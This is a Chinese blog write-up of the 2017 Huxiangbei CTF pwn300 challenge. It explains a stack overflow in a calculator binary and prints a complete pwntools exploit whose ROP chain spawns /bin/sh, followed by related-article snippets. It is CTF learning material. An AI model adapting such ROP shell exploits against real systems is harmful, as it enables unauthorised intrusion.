2017湖湘杯pwn300的wp

最新推荐文章于 2021-09-01 08:34:49 发布
最新推荐文章于 2021-09-01 08:34:49 发布
阅读量1.1k 收藏
点赞数
分类专栏: ctf的wp 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/78705459
版权

湖湘杯的pwn比赛很有趣,我做了pwn300的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.csdn.net/download/niexinming/10143408
把pwn300直接拖入ida中:
main函数:
image
add函数:
image
这个题目很有意思,首先开辟一个3到255大小的堆空间,然后做加减乘除的计算之后把计算结果放入堆中,最后可以把所有的计算结果用memcpy函数全部放入函数的临时变量v5中也就是栈中,这样就会造成栈溢出
先运行一下程序看一下这个程序干了啥:
image
再看看程序开启了哪些保护:
image
看到这个程序开了栈不可执行,于是肯定就会想到用rop来做
这个题目用ida打开之后发现有很多函数,所以判断这个题目是静态编译的
image

所以可以用http://blog.csdn.net/niexinming/article/details/78259866 中我提到的ROPgadget工具来做,不出意外,很成功的找了完整的rop链
image
这个题目还有个难点就是不能直接输入十六进制,所以根据http://blog.csdn.net/niexinming/article/details/78666941 我的这篇文件可以用ctypes.c_int32(0x123).value进行转换
所以我的exp是: 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
import binascii
import ctypes as ct
from struct import pack

context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

def debug(addr = '0x08048ff5'):
    raw_input('debug:')
    gdb.attach(io, "b *" + addr)

def base_addr(prog_addr,offset):
    return eval(prog_addr)-offset

elf = ELF('/home/h11p/hackme/huxiangbei/pwn300')

io = process('/home/h11p/hackme/huxiangbei/pwn300')

p=[]

p.append( 0x0806ed0a)  # pop edx ; ret
p.append( 0x080ea060)  # @ .data
p.append( 0x080bb406)  # pop eax ; ret
p.append(eval('0x'+binascii.b2a_hex('nib/')))
p.append( 0x080a1dad)  # mov dword ptr [edx], eax ; ret
p.append( 0x0806ed0a)  # pop edx ; ret
p.append( 0x080ea064)  # @ .data + 4
p.append( 0x080bb406)  # pop eax ; ret
p.append(eval('0x'+binascii.b2a_hex('hs//')))
p.append(0x080a1dad)  # mov dword ptr [edx], eax ; ret
p.append(0x0806ed0a)  # pop edx ; ret
p.append(0x080ea068)  # @ .data + 8
p.append(0x08054730)  # xor eax, eax ; ret
p.append(0x080a1dad)  # mov dword ptr [edx], eax ; ret
p.append(0x080481c9)  # pop ebx ; ret
p.append(0x080ea060)  # @ .data
p.append(0x0806ed31)  # pop ecx ; pop ebx ; ret
p.append(0x080ea068)  # @ .data + 8
p.append(0x080ea060)  # padding without overwrite ebx
p.append(0x0806ed0a)  # pop edx ; ret
p.append(0x080ea068)  # @ .data + 8
p.append(0x08054730)  # xor eax, eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x0807b75f)  # inc eax ; ret
p.append(0x08049781)  # int 0x80

tempnum=0
#debug()
io.recvuntil('How many times do you want to calculate:')
io.sendline('255')
for i in xrange(0,16):
    io.recvuntil('5 Save the result\n')
    io.sendline('1')
    io.recvuntil('input the integer x:')
    io.sendline(str(tempnum))
    io.recvuntil('input the integer y:')
    io.sendline('0')

for j in p:
    io.recvuntil('5 Save the result\n')
    io.sendline('1')
    io.recvuntil('input the integer x:')
    io.sendline(str(ct.c_int32(j).value))
    io.recvuntil('input the integer y:')
    io.sendline('0')

io.recvuntil('5 Save the result\n')
io.sendline('5')
io.interactive()
io.close()

注意一点就是,就是程序在return 0之前会调用free,而为了保证free函数的正常运行,前十六次计算的结果必须为0,后面的计算结果就可以随意了

最后getshell的效果是:
image

niexinming
关注
专栏目录
湖湘2021-pwn-final部分复现
qq_53062301的博客
12-09 4993
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
2017湖湘pwn300
12-03
2017湖湘pwn300的题目,请大家自行下载。。。。。。
2017湖湘 pwn300
weixin_45966329的博客
02-28 176
2017湖湘 pwn300 该题为简单栈溢出,利用方法如下: (1)覆盖返回地址为read函数读入shellcode (2)执行mprotect让bss段的地址变的可执行 (3)跳转shellcode执行即可 from pwn import * context(os='linux',arch='x86',log_level='debug') io=remote("node3.buuoj.cn",29028) #io=process("pwn300") elf=ELF('pwn300') def add
2017湖湘Writeup
weixin_30642029的博客
11-26 308
RE部分 0x01 Re4newer 解题思路: Step1:die打开,发现有upx壳。 Step2:脱壳,执行upx -d 文件名即可。 Step3:IDA打开,shift+F12看字符串。 点进去,F5看伪代码如图。 Step4:逆算法。点进sub_401080可以看到关键函数的算法。 ...
2017湖湘pwn100的wp
一个码农的笔记
11-30 2760
湖湘的pwn比赛很有趣,我做了pwns100的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.csdn.net/download/niexinming/10139497 把pwns100直接拖入ida中: main函数: base64解码函数 输入函数 可以看到read可以输入的字符串可以长达0x200个,这里可造成缓冲区溢出漏洞
2017湖湘pwn200的wp
一个码农的笔记
12-03 2895
湖湘的pwn比赛很有趣,我做了pwns200的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.csdn.net/download/niexinming/10142411 把pwns100直接拖入ida中: main函数: sub_80485CD函数: 在sub_80485CD函数可以看到输入的数据直接进入了printf函数中,所以这个肯定是一
2017湖湘pwn100的题目
11-30
2017湖湘pwn100的题目的二进制文件和libc的二进制文件
2017湖湘pwn200
12-02
【标题】"2017湖湘pwn200"是一个网络安全竞赛中的挑战项目,专注于Pwn(破解)类别。在这个挑战中,参赛者需要利用编程和安全漏洞的知识来解决问题,通常涉及缓冲区溢出、格式字符串漏洞、堆溢出等攻击技术。这个...
2017湖湘pwn400
12-09
2017湖湘pwn400的pwn题目,喜欢的就下载下来做一下。。
2020 湖湘 PWN WriteUp
SkYe's Blog
11-11 743
比赛的时候出去玩了,这就来复盘 babyheap 基本情况 增删查改,数量限制比较宽松挺大的,大小固定 0xf8 。 漏洞 safe_read 写入大小为 0xf8 会溢出修改下一个 chunk size 最低两位为 \x00 。 char *__fastcall safe_read(char *ptr, int size) { char *result; // rax read(0, ptr, 0xF0uLL); result = &ptr[size]; .
HITCTF PWN300--dynelf
Vccxx的博客
04-08 1080
第一次用Dynelf,脚本调了一下午。。hitctf pwn300题目链接:http://pan.baidu.com/s/1eSCCOE2漏洞分析:三个write之前的一个函数调用了read来读入字符,而这里存在明显的缓冲区溢出,可以覆盖main函数的栈地址,这个题没给libc,got表里没有system之类的函数,于是考虑用dynelf。攻击脚本:from pwn import * io = pr
湖湘hxb_pwn
Trick的博客
11-08 185
湖湘hxb_pwn pwn_printf pwn_libc ida 16次循环 下面if判断v12<=0x20 所以写 for i in range(16): n.sendline("32") 跟进if下面的函数 这里变量的栈是空栈0h,所以offset只需要64bit程序的8个就行。 再然后a * a1,所以传参需要double 0x20,也就是0x40 ROPgadget --binary pwn_printf 找到pop_rdi_ret的地址 复习一下libc64_payload公式
buuoj Pwn writeup 256-260
yongbaoii的博客
09-01 324
256 ciscn_2019_s_2 257 qwb2019_one 258 hxb_pwn300 259 others_easyheap 260 pwnable_bf # -*- coding: utf-8 -*- '''#coding:utf8 from pwn import * #预先生成一个可以pass的payload payload = '' for i in range(50): payload += '0' payload += p8(0x100-0x40 +
湖湘pwn400的wp
一个码农的笔记
12-09 2127
湖湘的pwn比赛很有趣,我做了pwn300的题目,感觉不错,我把wp分享出来,pwns的下载链接是: http://download.csdn.net/download/niexinming/10152069 把pwn400直接拖入ida中: main函数: Create Profile函数: Print Profile函数: Update Profile函数: Ex
湖湘 2017 复赛Web部分题解
Assassin
11-25 3426
WebWeb200文件上传一开始真的以为是文件上传,后面发现是骗人的,简单的文件包含,扫描发现存在flag.php payloadhttp://118.190.87.135:10080/?op=php://filter/convert.base64-encode/resource=flag 解密得到flag<?php $flag="flag{c420fb4054e91944a71ff68f70
2017 429 ichunqiu ctf smallest(pwn300) writeup
jmp esp
05-22 2378
Challenge - smallest (pwn 300) - 429 ichunqiu ctf 2017吐槽这次这道smallest确实很有创造力,算是这次比赛我感觉比较好的地方了。这次比赛本身槽点是无数的,10点开始的比赛,11点都进不去平台,紧急修复到12点,然后12点半在网站通知比赛时间到1点,中途一直不肯决定 比赛到底推迟到几点进行,一早上的课都不敢好好上,确实是非常的坑。然后在做这道
一只神奇的asp小马
一个码农的笔记
12-16 4875
<% dim file,content,path,task,paths,paths_str,nn,nnfilename,dpath,htmlpath,htmlpath_,htmlpath_str,addcontent,includefiles,noincludefiles,filetype,hanfiles,recontent,site_root,defaulthtml,defaultreplac
【学习笔记】CTF PWN选手的养成(一)
prettyX的博客
11-20 2207
在ichunqiu上看的视频,对学习内容进行整理,对Atum老师表示感谢。 第一章 基础知识 0X01 PWN 简介 软件安全:软件安全专注于研究软件的设计和实现的安全 研究对象:代码(源码、字节码、汇编等) 研究目标:发掘漏洞、利用漏洞、修补漏洞 研究技术:逆向工程、漏洞挖掘与利用、漏洞防御技术 CTF PWN:软件安全研究的一个缩影 研究对象:可执行文件,主要是ELF文件 研究...
ctf题库---加减乘除
qq_36791003的博客
08-03 1007
题目 一段linux/x86下删除指定文件的汇编代码 解题链接: http://ctf5.shiyanbar.com/overflow/1/ 解题 使用pwntools 安装: https://www.cnblogs.com/pcat/p/5451780.html 用法介绍: https://blog.csdn.net/weixin_41400278/article/detail...
2023 羊城 pwn
最新发布
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值